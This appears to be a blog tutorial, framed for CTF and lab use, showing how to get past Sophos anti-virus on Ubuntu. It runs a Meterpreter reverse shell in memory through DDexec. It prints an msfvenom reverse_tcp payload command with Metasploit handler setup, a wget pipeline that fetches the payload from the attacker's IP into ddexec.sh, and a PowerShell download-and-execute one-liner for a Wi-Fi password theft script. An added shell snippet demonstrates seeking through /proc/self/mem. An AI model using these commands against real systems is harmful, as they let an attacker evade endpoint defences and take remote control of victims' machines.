Bypassing Sophos anti-virus with DDexec
Introduction
Have you ever had a CTF challenge where you discovered a vulnerability, say one you could reach with a kernel exploit, but could not write anything to disk? Or perhaps anti-virus software was running and blocked the execution of your malicious binary. DDexec can solve problems like these and more: it loads a binary into memory and executes it without ever writing anything to disk.
On Windows, executing scripts in memory has been relatively easy for years using PowerShell. I demonstrated this in a prior post (Stealing Wi-Fi passwords with Digi spark):
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://$YOUR_VM_IP/theft.ps1')
The script (theft.ps1) is never saved to disk; it is downloaded and executed in memory, which keeps it away from file-based anti-virus scanning (although on current Windows the PowerShell engine still hands script content to AMSI before running it).
The creators of DDexec designed it with distroless containers in mind. Such containers ship only the minimum tools and libraries required to run one application, and they often give the user no writable location on disk at all. That means a serious vulnerability inside the container can still be hard to exploit, because a binary normally has to be written to disk before it can be executed. DDexec sidesteps that requirement: it is a shell script that takes a binary on standard input and writes it straight into the memory of an already-running process through /proc/<pid>/mem, then redirects that process to the new code, so the binary runs without ever being written to disk. In this example I will show how DDexec can be used to bypass an up-to-date anti-virus product.
DDexec dependencies:
- tail | dd | hexdump | any other program that allows seeking through a file descriptor
- bash | zsh | ash (busybox)
- head
- tail
- cut
- grep
- od
- readlink
- wc
- tr
- basename
- base64
Setup:
Attacker machine:
- Kali Linux Hyper-V virtual machine
- Metasploit
Victim machine:
- Ubuntu Hyper-V virtual machine
- Sophos endpoint AV installed
Demonstration:
Creating the reverse shell with msfvenom:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.19.51.113 LPORT=443 -f elf -o bad.elf
Setting up the Meterpreter handler in msfconsole:
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 172.19.51.113
set LPORT 443
run
Testing first that Sophos AV blocks the reverse shell binary when it is written to disk:
Now using DDexec (with ddexec.sh already on the victim) to fetch bad.elf, base64-encode it as the script expects on standard input, and execute it in memory:
wget -O- http://172.19.51.113/bad.elf | base64 -w0 | bash ddexec.sh
Why does this work?
Sophos, like most anti-virus products, relies heavily on signature-based detection of files on disk. The on-access scanner compares a file's contents against a database of known malware signatures when the file is written or is about to be executed; if it matches, execution is blocked and the user is alerted. That is exactly what happened when bad.elf was saved to the victim. With DDexec the same payload is streamed over the network, decoded inside ddexec.sh and written directly into process memory, so there is never a file for the on-access scanner to examine. Two caveats are worth keeping in mind: this defeats only the file-scanning layer, so an endpoint product with behavioural detection, memory scanning or network monitoring could still catch the Meterpreter session, and the result reflects one product's configuration at the time of testing rather than anti-virus in general. I recommend checking out the creator's GitHub and the various presentations on DDexec to learn more about how this incredible tool works and how it can be used to bypass other restricted environments.
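To make the mechanism behind the two explanations above concrete, here is an added example; it is not part of the original post or of the DDexec project. It shows the primitive the dependency list hints at with "seek through a file descriptor": the access check on /proc/<pid>/mem happens at open(), so once a shell has opened its own memory, children that inherit the descriptor (tail, dd) can seek to any address and read or write through it, even under ptrace restrictions such as Yama that would stop them opening the file themselves. The function below reads the first four bytes of the shell binary's lowest mapping, which should be the ELF magic 7f 45 4c 46. DDexec uses the same inherited descriptor to write its payload into process memory and hijack execution; this demo only reads, and assumes a Linux host with procfs and GNU or busybox coreutils.

```shell
#!/bin/sh
# Added example: seek-and-read through an inherited /proc/self/mem descriptor.
# Assumes Linux with procfs and GNU or busybox coreutils (tail, head, od, tr).

read_own_elf_magic() {
    # The shell itself opens its own maps and mem, so the ptrace-style
    # access check passes even under Yama restrictions; children that
    # inherit fd 3 need no permission of their own to seek and read it.
    read -r first_map < /proc/self/maps     # lowest mapping: normally the
    base=$((0x${first_map%%-*}))            # binary's ELF header page
    exec 3< /proc/self/mem
    # tail -c +N starts output at byte N (1-based); on a seekable file
    # that is an lseek() rather than a read from offset 0, which is what
    # makes arbitrary addresses reachable. head stops us after four bytes
    # so we never run off the end of the mapping.
    tail -c +$((base + 1)) <&3 2>/dev/null | head -c 4 | od -An -tx1 | tr -d ' \n'
    exec 3<&-
}

# Prints 7f454c46 on any Linux host running an ELF shell.
read_own_elf_magic
echo
```

Replace the read with `dd seek=... conv=notrunc >&3` and you have the write side of the same trick, which is why the dependency list asks only for some program that can seek through a descriptor rather than for any particular binary.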
- DDexec GitHub
- DDexec YouTube presentation